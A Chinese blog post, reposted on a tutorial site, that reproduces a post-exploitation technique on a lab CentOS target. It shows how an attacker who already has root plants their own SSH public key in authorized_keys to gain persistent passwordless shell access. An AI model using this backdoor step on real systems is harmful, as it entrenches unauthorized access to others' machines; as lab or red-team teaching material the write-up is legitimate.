2. 程式人生 > 實用技巧 >無密碼正向直連內網linux目標機復現

無密碼正向直連內網linux目標機復現

阿新 發佈:2020-12-29

無密碼正向直連內網linux目標機復現

文章來自sxf大佬klion

https://mp.weixin.qq.com/s/GPPvci8qKuvc5d3Q7Cer7Q

場景說明

前期通過一些 Rce,提權 或者其它方式,拿到內網一臺linux 目標機的root許可權,但使用者密碼hash跑不出來,機器無法正常出網,Webshell 裡操作實在是麻煩, 費勁,為了能更方便的進行後續的內網滲透操作,現在就迫切需要一個真正的pts終端,怎麼搞 ?

復現

目標機:centos7 192.168.232.128

攻擊機:kali 192.168.232.129

0x01 攻擊機生成金鑰

# cd ~/.ssh		//沒有自己建
# ssh-keygen -t rsa		//一直回車就OK,在/root/.ssh/id_rsa.pub檔案這個是我們需要上傳到目標伺服器上的

0x02 rz上傳檔案至目標伺服器

如何伺服器不支援請安裝
yum -y install lrzsz 
然後rz -be 上面的id_rsa.pub

0x03 匯入檔案

把id_rsa.pub匯入authorized_keys檔案,沒有這個檔案自己建立
cat id_rsa.pub > ~/.ssh/authorized_keys

0x04 直接連線

攻擊機直接使用ssh連線
ssh 192.168.232.128

這裡可以使用rpm -qa | grep ssh檢視目標是否安裝ssh服務

相關推薦

無密碼正向linux目標復現

無密碼正向linux目標復現 文章來自sxf大佬klion https://mp.weixin.qq.com/s/GPPvci8qKuvc5d3Q7Cer7Q

滲透-本資訊蒐集

技術標籤:資訊蒐集筆記滲透滲透資訊蒐集安全 作者:小剛 一位苦於資訊保安的萌新小白帽,記得關注給個贊,謝謝 本實驗僅用於資訊防禦教學,切勿用於其它用途

Linux系統如何在離線環境或環境安裝部署Docker服務和其他服務

如何在離線環境或純環境的Linux機器上安裝部署Docker服務或其他服務。本次我們以Docker服務和Ansible服務為例。

電腦與Linux開發板搭建NFS檔案系統——網線

前言 本人所使用的環境為Win10筆記本+VMware15+Ubuntu18.04+I.MX6ULL開發板 一、網路配置

Linux下實現Firewalld Net 外埠轉發至

前提條件: 公網伺服器至少需要2個絡卡,一個配公網一個配伺服器絡卡配置同公網伺服器相同地址

讓只某臺機器A的機器B能上外

---| 192.168.2.2 | |Server A| 192.168.1.2 |---| 192.168.1.1 | |Server B| 伺服器A的設定 伺服器A

linux搭建郵件伺服器

一、配置發件伺服器 1.1 根據現場IP,配置主機名 vi /etc/hosts 192.168.40.133 mail.test.com

linux(無法連線外)伺服器安裝nginx

(無法連線外)伺服器安裝nginx並部署vue網站 1:解決缺少gcc、pre-devel、openssl-devel、zlib-devel等依賴的問題

tengine、nginx配置正向代理,其他機器通過代理訪問外,支援https

本文為joshua317原創文章,轉載請註明:轉載自joshua317部落格https://www.joshua317.com/article/250

Linux-yum本地與倉庫搭建

目錄 1.yum簡介 2.應用場景 3.本地yum倉庫搭建 3.1流程 3.2實操 3.利用HTTP服務搭建yum倉庫

# Linux穿透

準備兩臺機器 : 192.168.1.101外: 1.1.1.1 (雲伺服器,出於安全性考慮這裡展示的是虛擬地址,換成自己的外地址就行)

Linux滲透

Linux雖然沒有域環境,但是當我們拿到一臺Linux 系統許可權,難道只進行一下提權,捕獲一下敏感資訊就結束了嗎?顯然不只是這樣的。本片文章將從拿到一個Linux shell開始,介紹Linux內網滲透技術,分為容器逃逸、Lin

C#實現獲取本地(區域網)和外(公網)IP地址的方法分析

本文例項講述了C#實現獲取本地(區域網)和外(公網)IP地址的方法。分享給大家供大家參考,具體如下:

Android開發獲取手機IP地址與外IP地址的詳細方法與原始碼例項

在進行Android應用開發過程中,有時候會遇到獲取當前Android裝置所使用的網路IP地址的場景,有時候需要本地的網路IP地址,即區域網地址,更多的時候是需要當前網路的真實的對外IP地址,即真實的網路地址,如大資料分析

C#獲取本地IP地址,+外方法

1 #region 獲取、外Ip 2 3/// <summary> 4/// 獲取本地ip地址,優先取ip 5/// </summary>

如何把外python虛擬環境遷移到

python2.7 虛擬環境中安裝了 flask 模組,期望在內使用,如何遷移外的虛擬環境到呢?

Win10中Linux更換阿里源

1.檢視Ubuntu的版本號,應該是16.04,對應的代號是xenial. 找到codename lsb_release -a 2.備份建資料來源

傻瓜式教學--win10 + frp + rdpwrap + 阿里雲伺服器 --實現win10 多使用者同時遠端登入

概述:   使用win10 專業版 + frp + RDPwrap + 阿里雲伺服器 的組合實現win10 多使用者同時遠端登入內網機。使用frp 做內網穿透,將內網機的指定埠暴露在外,通過ip+port 來實現遠端登入。再使用rdpwrap 來破解w

【python + NATAPP】實現穿透的簡易資料傳輸

1. 服務端 接收兩張影象的地址,返回這兩張影象的相似度 import os, shutil, requests import cv2

Windows10Linux子系統安裝及C++程式設計環境配置

想在Linux系統下進行C++程式設計學習,發現Windows10建了Linx核心,可以直接像安裝軟體一樣安裝Ubuntu子系統,這比安裝雙系統和虛擬機器方便多了。